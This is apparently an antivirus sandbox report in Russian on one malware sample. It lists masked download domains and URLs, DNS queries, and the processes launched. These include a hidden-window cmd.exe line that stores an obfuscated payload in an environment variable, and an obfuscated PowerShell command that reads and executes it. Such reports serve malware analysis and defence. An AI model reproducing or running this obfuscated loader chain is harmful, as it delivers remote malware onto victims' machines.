Техническая информация
- '<SYSTEM32>\cmd.exe' cmd.exe /c"set nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72...
- 'kp#.ru':80
- 'kp#.ru':443
- 'mi#####giecocamp.com':80
- 'ac###last.ru':80
- 'lo##ic.com':80
- 'lo##ic.com':443
- http://kp#.ru/EjsaGtbK
- http://ac###last.ru/9FezrVftG
- http://lo##ic.com/PIjYc2I
- 'kp#.ru':443
- 'lo##ic.com':443
- DNS ASK uc##limp.ru
- DNS ASK kp#.ru
- DNS ASK mi#####giecocamp.com
- DNS ASK ac###last.ru
- DNS ASK lo##ic.com
- '<SYSTEM32>\cmd.exe' cmd.exe /c"set nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ${ex`eC`UtioncO`NTE`Xt}.\"I`NV`oKEcomMAnD\".( \"{2}{3}{0}{1}\"-f 'scR','IPT','inVOk','E' ).Invoke( (.( \"{1}{2}{0}\"-f'iTEm','CH','ild' ) (\"{2}{1}{0}\"-f 'SDJ','Q','ENv:N' ) ).\"vaL`Ue\" )